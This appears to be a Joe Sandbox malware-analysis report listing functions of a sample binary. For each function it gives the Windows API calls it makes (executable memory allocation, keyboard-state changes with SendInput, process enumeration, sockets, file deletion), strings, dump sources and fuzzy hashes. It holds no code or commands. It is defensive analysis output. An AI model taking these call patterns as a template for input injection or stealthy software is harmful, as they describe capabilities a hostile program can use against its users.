LoadLibraryA.KERNEL32(kernel32.dll,00000001,00698CF4,?,006AF910), ref: 006990EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00699100

Strings

GetModuleHandleExW, xrefs: 006990FA
kernel32.dll, xrefs: 006990E9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 12bc7cfc3f9c9e6f3cfe1b3270adc6284f06067bed3032f5d95adfd3fb5c11bc
Instruction ID: e7cf0267b57393a2e8caf69cd5f05e377841f7430e2ec7d649ae49b24d14a3d1
Opcode Fuzzy Hash: 12bc7cfc3f9c9e6f3cfe1b3270adc6284f06067bed3032f5d95adfd3fb5c11bc
Instruction Fuzzy Hash: 54D01234510713CFDB20AF75D85C54676EAAF06352B168C3ED485D6650EA70D880CA61

Function 00661714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00661718
__swprintf.LIBCMT ref: 00661749

Strings

WIN_XPe, xrefs: 00661788
%.3d, xrefs: 00661723

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: a04314f896a0901e37b651dd030a3844e35b3760217a8f6cc79364d67d74caec
Instruction ID: 373b35b92f49a2121a7d2741e1535d88c3eaf735591cdaae98a77c726f2dcecf
Opcode Fuzzy Hash: a04314f896a0901e37b651dd030a3844e35b3760217a8f6cc79364d67d74caec
Instruction Fuzzy Hash: 51D01771804129FACB409B909C888F97B7EAB0A311F180463B406E6140E226AB96EA21

Function 0067717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ddc295d04edc00465aad524984119eca507cecd738de7c2aa9c8277b3c5e1d1
Instruction ID: 682c01a82262511dd64945d19422f15ec3213eb67a3c3935bef16d35ce9c4106
Opcode Fuzzy Hash: 7ddc295d04edc00465aad524984119eca507cecd738de7c2aa9c8277b3c5e1d1
Instruction Fuzzy Hash: 7EC12C75A04216EFCB14CFA4C884AAEBBF6FF48714B158598E819EB351D730ED81DB90

Function 0069E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0069E0BE
CharLowerBuffW.USER32(?,?), ref: 0069E101

Part of subcall function 0069D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0069D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0069E301
_memmove.LIBCMT ref: 0069E314

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 51d2fa8c8185553f7771b4a508ee3e6049f1f8963a573604e7bcfb7f6561d144
Instruction ID: 5083c16d9e08e94d2ca1226e4f16072f46472dfde4a43dc015a6cd44c2e45615
Opcode Fuzzy Hash: 51d2fa8c8185553f7771b4a508ee3e6049f1f8963a573604e7bcfb7f6561d144
Instruction Fuzzy Hash: E5C15871A043119FCB44DF28C48096ABBEAFF89714F04896EF8999B351D731E946CF82

Function 00698093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006980C3
CoUninitialize.OLE32 ref: 006980CE

Part of subcall function 0067D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067D5D4

VariantInit.OLEAUT32(?), ref: 006980D9
VariantClear.OLEAUT32(?), ref: 006983AA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0d3b23fdfc33090b2675e2d1ca51b671bd47cc339da615c9136082ee441ced79
Instruction ID: 3441e16735bd7872aa553dd2ae86c51a5d0bc3e73b184289c3160487d464f9f7
Opcode Fuzzy Hash: 0d3b23fdfc33090b2675e2d1ca51b671bd47cc339da615c9136082ee441ced79
Instruction Fuzzy Hash: 9DA16A35604B119FCB40DF64C481A6AB7EABF8A714F08481CF9959B7A1CB34ED05CF9A

Function 0067687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067688E
SysAllocString.OLEAUT32(00000000), ref: 00676937
VariantCopy.OLEAUT32 ref: 00676966
VariantClear.OLEAUT32(?), ref: 0067698D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 91d3e455acf44133375c1c019a71dc8411c6c006516f2000a4417c0520a10fa5
Instruction ID: f70d21c358cc7c84c69a31c485ae9a40119c0a334c430e46e5beaea0e89c0b6d
Opcode Fuzzy Hash: 91d3e455acf44133375c1c019a71dc8411c6c006516f2000a4417c0520a10fa5
Instruction Fuzzy Hash: 4351D374700B029EDF64AF65D891A6AB3E7AF45310F20D81FF59EDB292DA30D8818B15

Function 006A97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0167DFE0,?), ref: 006A9863
ScreenToClient.USER32(00000002,00000002), ref: 006A9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006A9903

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0934f0658f8312e95f80afb58c93ba1b8939e49e777cef82ca7248360c566227
Instruction ID: 03cce2c308208f1af3de857590a48ff7235d557131f5df561f3dd9554aa9bb9e
Opcode Fuzzy Hash: 0934f0658f8312e95f80afb58c93ba1b8939e49e777cef82ca7248360c566227
Instruction Fuzzy Hash: 80512C34A00209AFCB14EF54D884AEE7BB6FF56360F248559F9559B3A0D731AD41CFA0

Function 00679A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00679AD2
__itow.LIBCMT ref: 00679B03

Part of subcall function 00679D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00679DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00679B6C
__itow.LIBCMT ref: 00679BC3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 8e9b614df479a83bfa100d57a1883eef008f9eb35989ba764b0f14d9406825ff
Instruction ID: 0682836443c0eafac43c0ed5168dfcf7eb60b1b1c0454cbf09c63e1550f86b33
Opcode Fuzzy Hash: 8e9b614df479a83bfa100d57a1883eef008f9eb35989ba764b0f14d9406825ff
Instruction Fuzzy Hash: 6A41B170A00619ABDF21EF64D846FEE7BFBEF45710F004069F909A7291DB709A44CBA5

Function 006969AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006969D1
WSAGetLastError.WSOCK32(00000000), ref: 006969E1

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00696A45
WSAGetLastError.WSOCK32(00000000), ref: 00696A51

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 92994a4a448f6df39694e031d8ecd6143ed376b9ce325724af1846c9e97b5316
Instruction ID: 0d7a69bc3d6e852848675110ed054ee682cef48a760c4829d87dfe73df4315ea
Opcode Fuzzy Hash: 92994a4a448f6df39694e031d8ecd6143ed376b9ce325724af1846c9e97b5316
Instruction Fuzzy Hash: 2641C3757006106FEBA0AF64DC86F6A77AA9F44B10F44841CFA199B3C2DA749D008B55

Function 0069641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006AF910), ref: 006964A7
_strlen.LIBCMT ref: 006964D9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a730c800f3969d4bf7f8b28e896a43c766ff891e24c7ff845f8b61ee090c7840
Instruction ID: 2c4545a0a2106accf4a7ba241b6fdff4b7a532f9636711b7aea66b286526ec1b
Opcode Fuzzy Hash: a730c800f3969d4bf7f8b28e896a43c766ff891e24c7ff845f8b61ee090c7840
Instruction Fuzzy Hash: 9A41B531900614ABCF54EBA4EC85EEEB7AFAF44310F158159F81997292DB30ED41CB58

Function 0068B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0068B89E
GetLastError.KERNEL32(?,00000000), ref: 0068B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0068B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0068B915

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: ad2183a43cac411d323184fdacb4debbe848053749496a1cc851ecbff883bba1
Instruction ID: 4e765dc531a71be35377c1cc5480c6e2a7f90fdda74ee22ccd0f46addeb7421b
Opcode Fuzzy Hash: ad2183a43cac411d323184fdacb4debbe848053749496a1cc851ecbff883bba1
Instruction Fuzzy Hash: 4D412D35600910DFCB50EF65D444A99BBE2EF8A310F098498EC4A9B362CB34FD01CFA9

Function 006A8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006A88DE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3861b3335f9c0c4497fbe083c27681db2f8fd110738496e00aeb5478c3e8966b
Instruction ID: 68a218f371960edf6bafb84044097db87e64f26e64cc21125970b338b84ca1e5
Opcode Fuzzy Hash: 3861b3335f9c0c4497fbe083c27681db2f8fd110738496e00aeb5478c3e8966b
Instruction Fuzzy Hash: 7D319034600208AEEB24BB58CC85BFA77B7EB07310F544116FA55E72A1CE74ED409F96

Function 006AAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006AAB60
GetWindowRect.USER32(?,?), ref: 006AABD6
PtInRect.USER32(?,?,006AC014), ref: 006AABE6
MessageBeep.USER32(00000000), ref: 006AAC57

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d12d4d935887e0be3a3ac2b96737500323b3e1fb63334417608f9ef4abba60da
Instruction ID: 06c5b9f578a884a86ec1d661e11d589cf88c296ee9097b4e421cfa4b5c543d13
Opcode Fuzzy Hash: d12d4d935887e0be3a3ac2b96737500323b3e1fb63334417608f9ef4abba60da
Instruction Fuzzy Hash: 6B415F34600219DFDB11EF98D884AA97BF7FB4A320F1490AAE4169F361D730AC45CF92

Function 00680AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00680B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00680B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00680BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00680BFB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d35ef69e6d9b873211720b2d399e57e51e95bc0ed4139fd0f01043d5ea0837eb
Instruction ID: 53d63238492da3ac7946ceca809c56bcdb9f0ef89459315bf9a7c78515f41d5f
Opcode Fuzzy Hash: d35ef69e6d9b873211720b2d399e57e51e95bc0ed4139fd0f01043d5ea0837eb
Instruction Fuzzy Hash: B7318C70D40208AFFF70AF65CC05BFABBABAF55314F044B5AF480522D1C37699499756

Function 00680C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00680C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00680C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00680CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00680D33

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 82280112bbcd50b9b61a3cdfc4e0c505c7f54c82ddb0a02b42ab5f679a62c1ae
Instruction ID: a0caa6c22361352f9e0b63239f835f4a2ec1a2dce2bbc16acc08983b5faebd58
Opcode Fuzzy Hash: 82280112bbcd50b9b61a3cdfc4e0c505c7f54c82ddb0a02b42ab5f679a62c1ae
Instruction Fuzzy Hash: 00316930940208AEFFB0AFA5CC15BFEBB67AF4A310F048B1EE484522D1C3399D498752

Function 006561C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006561FB
__isleadbyte_l.LIBCMT ref: 00656229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00656257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0065628D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6edc964e466c910d8d1b9044cf05153d535ee5a26264b3c5a9b3f026a8c5b04a
Instruction ID: e45c2b4f52099493b59865676415e3510a50ea55e614ea90297448862b5d53b5
Opcode Fuzzy Hash: 6edc964e466c910d8d1b9044cf05153d535ee5a26264b3c5a9b3f026a8c5b04a
Instruction Fuzzy Hash: 7931CE30604246AFDF218F65CC44BBA7BAAFF42312F554128FC64872A1DB31EE54DB90

Function 006A4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006A4F02

Part of subcall function 00683641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068365B
Part of subcall function 00683641: GetCurrentThreadId.KERNEL32 ref: 00683662
Part of subcall function 00683641: AttachThreadInput.USER32(00000000,?,00685005), ref: 00683669

GetCaretPos.USER32(?), ref: 006A4F13
ClientToScreen.USER32(00000000,?), ref: 006A4F4E
GetForegroundWindow.USER32 ref: 006A4F54

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: da2f0a1dd55d94eafd5f7fd0a8ae152f365a47b4a557e7abde0318a1498ad2f4
Instruction ID: ed48f9ff0b2b8df4b5871c265bbcc13d40d1cdbdcf005ba84757f01c3df2bccf
Opcode Fuzzy Hash: da2f0a1dd55d94eafd5f7fd0a8ae152f365a47b4a557e7abde0318a1498ad2f4
Instruction Fuzzy Hash: 68314D71D00118AFCB40EFA5DC819EFB7FAEF89300F10446AE415E7241EA75AE058FA5

Function 00683C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00683C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00683C88
Process32NextW.KERNEL32(00000000,?), ref: 00683CA8
CloseHandle.KERNEL32(00000000), ref: 00683D52

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: af1e3062277d1d5c979beb06f6412cdf4d1e6bb85c7311774d3a3c40ecd314eb
Instruction ID: 8ca07f4e63d145b56405282d00597d0434eff6a9b7358b168a31bdf1efb3a7a4
Opcode Fuzzy Hash: af1e3062277d1d5c979beb06f6412cdf4d1e6bb85c7311774d3a3c40ecd314eb
Instruction Fuzzy Hash: 6331A0711083559FD310EF50D881EAFBBEAEF95354F50092DF482862A1EB71AA49CB92

Function 006AC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetCursorPos.USER32(?), ref: 006AC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0065B9AB,?,?,?,?,?), ref: 006AC4E7
GetCursorPos.USER32(?), ref: 006AC534
